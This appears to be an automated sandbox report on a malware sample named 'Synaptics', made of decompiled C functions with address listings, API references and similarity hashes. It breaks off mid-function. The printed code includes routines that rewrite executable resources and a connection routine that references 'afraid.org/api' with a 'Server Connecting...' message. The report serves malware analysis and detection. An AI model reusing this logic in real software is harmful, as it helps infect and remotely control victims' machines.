                                                                                                                                                                                                                            0x0042c624
                                                                                                                                                                                                                            0x0042c63b
                                                                                                                                                                                                                            0x0042c626
                                                                                                                                                                                                                            0x0042c627
                                                                                                                                                                                                                            0x0042c62a
                                                                                                                                                                                                                            0x0042c62c
                                                                                                                                                                                                                            0x0042c62c
                                                                                                                                                                                                                            0x0042c62a
                                                                                                                                                                                                                            0x0042c624
                                                                                                                                                                                                                            0x0042c621
                                                                                                                                                                                                                            0x0042c640
                                                                                                                                                                                                                            0x0042c643
                                                                                                                                                                                                                            0x0042c64d
                                                                                                                                                                                                                            0x0042c645
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042c646

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C646
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL ref: 0042C60C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressCallbackDispatcherMetricsProcSystemUser
                                                                                                                                                                                                                            • String ID: GetSystemMetrics
                                                                                                                                                                                                                            • API String ID: 54681038-96882338
                                                                                                                                                                                                                            • Opcode ID: 7153245a6465a9df4cfdb0ee701d3aa453044e9105dccc5ca4f6593e8bd1a17a
                                                                                                                                                                                                                            • Instruction ID: e76955a9c08610525c92f9aeab2c1040e91631f36ff756307eb2880b474183d5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7153245a6465a9df4cfdb0ee701d3aa453044e9105dccc5ca4f6593e8bd1a17a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6EF0B4B07045649ACB709B3DBEC962F7645A7A5374FE0AF33A111472D1C2BCA842529D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00477244 Relevance: 4.6, APIs: 3, Instructions: 100COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 63%
                                                                                                                                                                                                                            			E00477244(intOrPtr __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v17;
				long _v24;
				void* _v28;
				void* _t35;
				intOrPtr* _t41;
				int _t54;
				int _t56;
				char _t57;
				void* _t62;
				intOrPtr _t71;
				intOrPtr _t76;
				intOrPtr* _t80;
				void* _t82;
				void* _t83;
				intOrPtr _t84;

				_t82 = _t83;
				_t84 = _t83 + 0xffffffe8;
				_push(__edi);
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				E00404E70(_v16);
				_push(_t82);
				_push(0x47735e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				_t35 = BeginUpdateResourceA(E00404E80(_v8), 0); // executed
				_t62 = _t35;
				_v17 = _t62 != 0;
				if(_v17 == 0) {
					_pop(_t71);
					 *[fs:eax] = _t71;
					_push(E00477365);
					return E004049E4( &_v16, 3);
				} else {
					 *[fs:eax] = _t84;
					_t41 = E0041DB54(_v12, 1, __edi, 0); // executed
					_t80 = _t41;
					_v24 =  *((intOrPtr*)( *_t80))( *[fs:eax], 0x47733c, _t82);
					_v28 = E0040275C(_v24);
					 *((intOrPtr*)( *_t80 + 0xc))();
					E00403BEC(_t80);
					_t54 = UpdateResourceA(_t62, 0xa, E00404E80(_v16), 0, _v28, _v24); // executed
					asm("sbb eax, eax");
					_v17 = _t54 + 1;
					_t56 = EndUpdateResourceA(_t62, 0); // executed
					if(_t56 == 0 || _v17 == 0) {
						_t57 = 0;
					} else {
						_t57 = 1;
					}
					_v17 = _t57;
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(E00477343);
					return E0040277C(_v28);
				}
			}





















                                                                                                                                                                                                                            0x00477245
                                                                                                                                                                                                                            0x00477247
                                                                                                                                                                                                                            0x0047724c
                                                                                                                                                                                                                            0x0047724d
                                                                                                                                                                                                                            0x00477250
                                                                                                                                                                                                                            0x00477253
                                                                                                                                                                                                                            0x00477259
                                                                                                                                                                                                                            0x00477261
                                                                                                                                                                                                                            0x00477269
                                                                                                                                                                                                                            0x00477270
                                                                                                                                                                                                                            0x00477271
                                                                                                                                                                                                                            0x00477276
                                                                                                                                                                                                                            0x00477279
                                                                                                                                                                                                                            0x00477287
                                                                                                                                                                                                                            0x0047728c
                                                                                                                                                                                                                            0x00477290
                                                                                                                                                                                                                            0x00477298
                                                                                                                                                                                                                            0x00477345
                                                                                                                                                                                                                            0x00477348
                                                                                                                                                                                                                            0x0047734b
                                                                                                                                                                                                                            0x0047735d
                                                                                                                                                                                                                            0x0047729e
                                                                                                                                                                                                                            0x004772a9
                                                                                                                                                                                                                            0x004772b8
                                                                                                                                                                                                                            0x004772bd
                                                                                                                                                                                                                            0x004772c5
                                                                                                                                                                                                                            0x004772d0
                                                                                                                                                                                                                            0x004772dd
                                                                                                                                                                                                                            0x004772e2
                                                                                                                                                                                                                            0x004772fd
                                                                                                                                                                                                                            0x00477305
                                                                                                                                                                                                                            0x00477308
                                                                                                                                                                                                                            0x0047730e
                                                                                                                                                                                                                            0x00477315
                                                                                                                                                                                                                            0x0047731d
                                                                                                                                                                                                                            0x00477321
                                                                                                                                                                                                                            0x00477321
                                                                                                                                                                                                                            0x00477321
                                                                                                                                                                                                                            0x00477323
                                                                                                                                                                                                                            0x00477328
                                                                                                                                                                                                                            0x0047732b
                                                                                                                                                                                                                            0x0047732e
                                                                                                                                                                                                                            0x0047733b
                                                                                                                                                                                                                            0x0047733b

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • BeginUpdateResourceA.KERNEL32 ref: 00477287
                                                                                                                                                                                                                            • UpdateResourceA.KERNEL32 ref: 004772FD
                                                                                                                                                                                                                            • EndUpdateResourceA.KERNEL32 ref: 0047730E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ResourceUpdate$Begin
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3792609998-0
                                                                                                                                                                                                                            • Opcode ID: fe88bd44683fbc6ad8d87189a687c06e9862b8563ba036f336503991b4723721
                                                                                                                                                                                                                            • Instruction ID: 9213f19192372b4cf94689ef5aed7bd179d22939e907d1359b5696ed986e8478
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe88bd44683fbc6ad8d87189a687c06e9862b8563ba036f336503991b4723721
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42318470E04204AFDB11DBA9D842BAEBBB8EB45754F51807AF904F73D1C6789D00D798
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0041DB98 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                            			E0041DB98(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* _a4, signed short _a8) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _t29;
				void* _t62;
				void* _t63;
				intOrPtr _t67;
				intOrPtr _t69;
				char _t70;
				intOrPtr _t73;
				void* _t86;
				void* _t88;
				void* _t89;
				intOrPtr _t90;

				_t70 = __edx;
				_t63 = __ecx;
				_t88 = _t89;
				_t90 = _t89 + 0xffffffdc;
				_v36 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				if(__edx != 0) {
					_t90 = _t90 + 0xfffffff0;
					_t29 = E00403F10(_t29, _t88);
				}
				_t86 = _t63;
				_v5 = _t70;
				_t62 = _t29;
				_t84 = _a8;
				_push(_t88);
				_push(0x41dcc1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t90;
				if(_a8 != 0xffff) {
					E0041DA90(E004098C4(_t86, _t84 & 0x0000ffff), 0);
					if( *((intOrPtr*)(_t62 + 4)) < 0) {
						E00409E98(_t86,  &_v36);
						_v24 = _v36;
						_v20 = 0xb;
						E0040C918(GetLastError(),  &_v40);
						_v16 = _v40;
						_v12 = 0xb;
						_t67 =  *0x49d6c8; // 0x417484
						E0040D23C(_t62, _t67, 1, _t84, _t86, 1,  &_v24);
						E00404378();
					}
				} else {
					E0041DA90(E00409940(), 0);
					if( *((intOrPtr*)(_t62 + 4)) < 0) {
						E00409E98(_t86,  &_v28);
						_v24 = _v28;
						_v20 = 0xb;
						E0040C918(GetLastError(),  &_v32);
						_v16 = _v32;
						_v12 = 0xb;
						_t69 =  *0x49de3c; // 0x41747c
						E0040D23C(_t62, _t69, 1, _t84, _t86, 1,  &_v24); // executed
						E00404378(); // executed
					}
				}
				_pop(_t73);
				 *[fs:eax] = _t73;
				_push(E0041DCC8);
				return E004049E4( &_v40, 4);
			}























                                                                                                                                                                                                                            0x0041db98
                                                                                                                                                                                                                            0x0041db98
                                                                                                                                                                                                                            0x0041db99
                                                                                                                                                                                                                            0x0041db9b
                                                                                                                                                                                                                            0x0041dba3
                                                                                                                                                                                                                            0x0041dba6
                                                                                                                                                                                                                            0x0041dba9
                                                                                                                                                                                                                            0x0041dbac
                                                                                                                                                                                                                            0x0041dbb1
                                                                                                                                                                                                                            0x0041dbb3
                                                                                                                                                                                                                            0x0041dbb6
                                                                                                                                                                                                                            0x0041dbb6
                                                                                                                                                                                                                            0x0041dbbb
                                                                                                                                                                                                                            0x0041dbbd
                                                                                                                                                                                                                            0x0041dbc0
                                                                                                                                                                                                                            0x0041dbc2
                                                                                                                                                                                                                            0x0041dbc7
                                                                                                                                                                                                                            0x0041dbc8
                                                                                                                                                                                                                            0x0041dbcd
                                                                                                                                                                                                                            0x0041dbd0
                                                                                                                                                                                                                            0x0041dbd8
                                                                                                                                                                                                                            0x0041dc53
                                                                                                                                                                                                                            0x0041dc5c
                                                                                                                                                                                                                            0x0041dc63
                                                                                                                                                                                                                            0x0041dc6b
                                                                                                                                                                                                                            0x0041dc6e
                                                                                                                                                                                                                            0x0041dc7a
                                                                                                                                                                                                                            0x0041dc82
                                                                                                                                                                                                                            0x0041dc85
                                                                                                                                                                                                                            0x0041dc8f
                                                                                                                                                                                                                            0x0041dc9c
                                                                                                                                                                                                                            0x0041dca1
                                                                                                                                                                                                                            0x0041dca1
                                                                                                                                                                                                                            0x0041dbda
                                                                                                                                                                                                                            0x0041dbea
                                                                                                                                                                                                                            0x0041dbf3
                                                                                                                                                                                                                            0x0041dbfe
                                                                                                                                                                                                                            0x0041dc06
                                                                                                                                                                                                                            0x0041dc09
                                                                                                                                                                                                                            0x0041dc15
                                                                                                                                                                                                                            0x0041dc1d
                                                                                                                                                                                                                            0x0041dc20
                                                                                                                                                                                                                            0x0041dc2a
                                                                                                                                                                                                                            0x0041dc37
                                                                                                                                                                                                                            0x0041dc3c
                                                                                                                                                                                                                            0x0041dc3c
                                                                                                                                                                                                                            0x0041dbf3
                                                                                                                                                                                                                            0x0041dca8
                                                                                                                                                                                                                            0x0041dcab
                                                                                                                                                                                                                            0x0041dcae
                                                                                                                                                                                                                            0x0041dcc0

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,0041DCC1,?,00000000,00418E54,00000001), ref: 0041DC0D
                                                                                                                                                                                                                              • Part of subcall function 004098C4: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,00000000,00000000,00418E54,0041DC4D,00000000,0041DCC1,?,00000000,00418E54), ref: 00409912
                                                                                                                                                                                                                              • Part of subcall function 00409E98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,00000000,00418E54,0041DC68,00000000,0041DCC1,?,00000000,00418E54,00000001), ref: 00409EB7
                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,0041DCC1,?,00000000,00418E54,00000001), ref: 0041DC72
                                                                                                                                                                                                                              • Part of subcall function 0040C918: FormatMessageA.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000,00418E54,0041DC7F,00000000,0041DCC1,?,00000000,00418E54,00000001), ref: 0040C937
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast$CreateFileFormatFullMessageNamePath
                                                                                                                                                                                                                            • String ID: |tA
                                                                                                                                                                                                                            • API String ID: 1652710734-3894576594
                                                                                                                                                                                                                            • Opcode ID: a4ee2061477b76fc7522b31128d4c20a63e750d3827f4c194167cc82d83d4c19
                                                                                                                                                                                                                            • Instruction ID: cf494aa496f929f16128ea2aa2fb3604e401f875384fb3819420099628f7d97d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4ee2061477b76fc7522b31128d4c20a63e750d3827f4c194167cc82d83d4c19
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D3181B0E046058FCB00EFA6C8816EEB7B1AB49304F50857AE904B7391D7785E45CBAA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004787F4 Relevance: 4.6, APIs: 3, Instructions: 93threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 78%
                                                                                                                                                                                                                            			E004787F4(intOrPtr* __eax, intOrPtr __ecx, char* __edx, intOrPtr _a4) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				int _v24;
				short* _v28;
				intOrPtr* _v32;
				void* __edi;
				signed int _t47;
				intOrPtr _t56;
				intOrPtr* _t57;
				void* _t60;
				char* _t62;
				void* _t70;
				int _t71;
				void* _t73;
				intOrPtr _t74;
				short* _t75;

				_v16 = __ecx;
				_v8 = __edx;
				_v32 = __eax;
				_t62 = _v8;
				_t70 = 0;
				_v12 = _t74;
				_t75 = _t74 - (_v16 + 1 << 2);
				_v20 = _t75;
				do {
					_t71 = E00409F88(_t62, _t70);
					_v24 = MultiByteToWideChar(0, 0, _t62, _t71, 0, 0) + 1;
					_t75 = _t75 - (_v24 + _v24 + 0x00000003 & 0xfffffffc);
					_v28 = _t75;
					if(_t70 != 0) {
						_t47 = _v16 - _t70;
						__eflags = _t47;
						 *((intOrPtr*)(_v20 + _t47 * 4)) = _v28;
					} else {
						 *_v20 = _v28;
					}
					MultiByteToWideChar(0, 0, _t62, _t71, _v28, _v24);
					_t68 = _v24;
					 *((short*)(_v28 + _v24 * 2 - 2)) = 0;
					_t62 =  &(_t62[_t71 + 1]);
					_t70 = _t70 + 1;
				} while (_t70 != _v16);
				_push(_a4);
				_push(GetThreadLocale());
				_push(_v16);
				_push(_v20);
				_t56 =  *0x49d770; // 0x49b500
				_push(_t56);
				_t57 = _v32;
				_push(_t57);
				if( *((intOrPtr*)( *_t57 + 0x14))() != 0x80020006) {
					_t60 = E004781BC(_t59, _t68, __eflags);
				} else {
					_t60 = E004787C0(_t73);
				}
				return _t60;
			}





















                                                                                                                                                                                                                            0x004787fd
                                                                                                                                                                                                                            0x00478800
                                                                                                                                                                                                                            0x00478803
                                                                                                                                                                                                                            0x00478806
                                                                                                                                                                                                                            0x00478809
                                                                                                                                                                                                                            0x0047880b
                                                                                                                                                                                                                            0x00478815
                                                                                                                                                                                                                            0x0047881a
                                                                                                                                                                                                                            0x0047881c
                                                                                                                                                                                                                            0x00478823
                                                                                                                                                                                                                            0x00478835
                                                                                                                                                                                                                            0x00478843
                                                                                                                                                                                                                            0x00478848
                                                                                                                                                                                                                            0x0047884c
                                                                                                                                                                                                                            0x0047885b
                                                                                                                                                                                                                            0x0047885b
                                                                                                                                                                                                                            0x00478863
                                                                                                                                                                                                                            0x0047884e
                                                                                                                                                                                                                            0x00478854
                                                                                                                                                                                                                            0x00478854
                                                                                                                                                                                                                            0x00478874
                                                                                                                                                                                                                            0x0047887c
                                                                                                                                                                                                                            0x0047887f
                                                                                                                                                                                                                            0x00478887
                                                                                                                                                                                                                            0x00478889
                                                                                                                                                                                                                            0x0047888a
                                                                                                                                                                                                                            0x00478892
                                                                                                                                                                                                                            0x00478898
                                                                                                                                                                                                                            0x0047889c
                                                                                                                                                                                                                            0x004788a0
                                                                                                                                                                                                                            0x004788a1
                                                                                                                                                                                                                            0x004788a6
                                                                                                                                                                                                                            0x004788a7
                                                                                                                                                                                                                            0x004788aa
                                                                                                                                                                                                                            0x004788b5
                                                                                                                                                                                                                            0x004788c0
                                                                                                                                                                                                                            0x004788b7
                                                                                                                                                                                                                            0x004788b8
                                                                                                                                                                                                                            0x004788bd
                                                                                                                                                                                                                            0x004788ce

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?), ref: 0047882F
                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?), ref: 00478874
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?), ref: 00478893
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$LocaleThread
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4086549855-0
                                                                                                                                                                                                                            • Opcode ID: 7c15dcf62a662ed130b5958e6fba4de64ea28af6bf3176f60dbcfd47ddc69cad
                                                                                                                                                                                                                            • Instruction ID: a51c77bdc8ed0243a2616cf9538eba40c564d6da85687872f4e0f106e925e268
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c15dcf62a662ed130b5958e6fba4de64ea28af6bf3176f60dbcfd47ddc69cad
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B310DB1E40209AFCB10DB99CC86BAFBBF8EF59310F10415AF518E7391D634AD018BA5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040408A Relevance: 4.6, APIs: 3, Instructions: 83COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 63%
                                                                                                                                                                                                                            			E0040408A(void* __ebx, void* __edi, void* __esi, void* __ebp, struct _EXCEPTION_POINTERS _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				struct _EXCEPTION_RECORD* _t22;
				intOrPtr* _t25;
				long _t28;
				long _t30;
				long _t31;
				long _t32;
				void* _t33;
				void* _t38;
				long _t41;
				intOrPtr* _t43;
				intOrPtr _t44;
				void* _t45;
				void* _t47;
				void* _t48;
				intOrPtr _t50;

				_t48 = __ebp;
				_t47 = __esi;
				_t45 = __edi;
				_t33 = __ebx;
				_t22 = _a4.ExceptionRecord;
				if((_t22->ExceptionFlags & 0x00000006) == 0) {
					_t41 = _t22->ExceptionInformation[1];
					_t38 = _t22->ExceptionInformation;
					if(_t22->ExceptionCode == 0xeedfade) {
						L11:
						if( *0x49b030 <= 1 ||  *0x49b02c > 0) {
							goto L14;
						}
						_t28 = UnhandledExceptionFilter( &_a4);
						_t38 = _t38;
						_t41 = _t41;
						_t22 = _t22;
						if(_t28 != 0) {
							goto L14;
						}
					} else {
						asm("cld");
						E00403B20(_t22);
						_t43 =  *0x49e010; // 0x40d76c
						if(_t43 != 0) {
							_t30 =  *_t43();
							if(_t30 != 0) {
								_t44 = _a12;
								if(_a4.ExceptionRecord->ExceptionCode == 0xeefface) {
									L10:
									_t41 = _t30;
									_t22 = _a4.ExceptionRecord;
									_t38 = _t22->ExceptionAddress;
									goto L11;
								} else {
									_t30 = E00403FA4(_t30, _t44, __edi);
									if( *0x49b030 <= 0 ||  *0x49b02c > 0) {
										goto L10;
									} else {
										_t31 = UnhandledExceptionFilter( &_a4);
										_t32 = _t30;
										if(_t31 != 0) {
											_t41 = _t32;
											_t22 = _a4.ExceptionRecord;
											_t38 = _t22->ExceptionAddress;
											L14:
											_t22->ExceptionFlags = _t22->ExceptionFlags | 0x00000002;
											 *0x49e018(_a8, "true", _t22, 0, _t38, _t41, _t22,  *[fs:ebx], _t48, _t45, _t47, _t33); // executed
											_t46 = _v8;
											_t25 = E00406CDC();
											_push( *_t25);
											 *_t25 = _t50;
											 *((intOrPtr*)(_v8 + 4)) = E00404190;
											E00403FF4(_t25,  *((intOrPtr*)(_t46 + 4)) + 5, _t47);
											goto __ebx;
										}
									}
								}
							}
						}
					}
				}
				return 1;
			}



















                                                                                                                                                                                                                            0x0040408a
                                                                                                                                                                                                                            0x0040408a
                                                                                                                                                                                                                            0x0040408a
                                                                                                                                                                                                                            0x0040408a
                                                                                                                                                                                                                            0x0040408c
                                                                                                                                                                                                                            0x00404097
                                                                                                                                                                                                                            0x004040a3
                                                                                                                                                                                                                            0x004040a6
                                                                                                                                                                                                                            0x004040a9
                                                                                                                                                                                                                            0x00404119
                                                                                                                                                                                                                            0x00404120
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404133
                                                                                                                                                                                                                            0x0040413b
                                                                                                                                                                                                                            0x0040413c
                                                                                                                                                                                                                            0x0040413d
                                                                                                                                                                                                                            0x0040413e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004040ab
                                                                                                                                                                                                                            0x004040ab
                                                                                                                                                                                                                            0x004040ac
                                                                                                                                                                                                                            0x004040b1
                                                                                                                                                                                                                            0x004040b9
                                                                                                                                                                                                                            0x004040bf
                                                                                                                                                                                                                            0x004040c3
                                                                                                                                                                                                                            0x004040c9
                                                                                                                                                                                                                            0x004040d7
                                                                                                                                                                                                                            0x00404110
                                                                                                                                                                                                                            0x00404110
                                                                                                                                                                                                                            0x00404112
                                                                                                                                                                                                                            0x00404116
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004040d9
                                                                                                                                                                                                                            0x004040d9
                                                                                                                                                                                                                            0x004040e5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004040f0
                                                                                                                                                                                                                            0x004040f6
                                                                                                                                                                                                                            0x004040fe
                                                                                                                                                                                                                            0x004040ff
                                                                                                                                                                                                                            0x00404105
                                                                                                                                                                                                                            0x00404107
                                                                                                                                                                                                                            0x0040410b
                                                                                                                                                                                                                            0x00404140
                                                                                                                                                                                                                            0x00404140
                                                                                                                                                                                                                            0x0040415e
                                                                                                                                                                                                                            0x00404164
                                                                                                                                                                                                                            0x00404168
                                                                                                                                                                                                                            0x0040416d
                                                                                                                                                                                                                            0x00404173
                                                                                                                                                                                                                            0x0040417f
                                                                                                                                                                                                                            0x00404189
                                                                                                                                                                                                                            0x0040418e
                                                                                                                                                                                                                            0x0040418e
                                                                                                                                                                                                                            0x004040ff
                                                                                                                                                                                                                            0x004040e5
                                                                                                                                                                                                                            0x004040d7
                                                                                                                                                                                                                            0x004040c3
                                                                                                                                                                                                                            0x004040b9
                                                                                                                                                                                                                            0x004040a9
                                                                                                                                                                                                                            0x004041b5

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 004040F6
                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_0000408C), ref: 00404133
                                                                                                                                                                                                                            • RtlUnwind.KERNEL32(?,?,Function_0000408C,00000000,?,?,Function_0000408C,?), ref: 0040415E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$Unwind
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1141220122-0
                                                                                                                                                                                                                            • Opcode ID: a99d5af059f1aae37b0278c7261ca6e289e14b7bcb43e1f360e26fca2bf73965
                                                                                                                                                                                                                            • Instruction ID: 064ae43801aa42ded6184c294ad0f6d3c4b4e8b690226dbcba8ce268034621ff
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a99d5af059f1aae37b0278c7261ca6e289e14b7bcb43e1f360e26fca2bf73965
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E3134B0604200AFD720DB15D989F277BE9EBD8714F19857AF6049B391D778EC80C769
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00495930 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 48%
                                                                                                                                                                                                                            			E00495930(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v28;
				intOrPtr _t11;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t22;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				intOrPtr _t47;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr _t61;
				intOrPtr _t62;

				_t61 = _t62;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t61);
				_push(0x495b6e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t62;
				Sleep(0x3e8); // executed
				if(E00474D34(0) == 0) {
					_t11 =  *0x49f134; // 0x21e41d4
					E0042F70C(_t11, 1);
				} else {
					_t16 =  *0x49dbdc; // 0x49f13c
					E004967D4( *_t16, __ebx, "Server Connecting...");
					_push(_t61);
					_push(0x495a09);
					_push( *[fs:eax]);
					 *[fs:eax] = _t62;
					_t50 =  *0x49f118; // 0x21e2f48
					_t21 = E00404FC4("afraid.org/api", _t50);
					_t65 = _t21;
					if(_t21 != 0) {
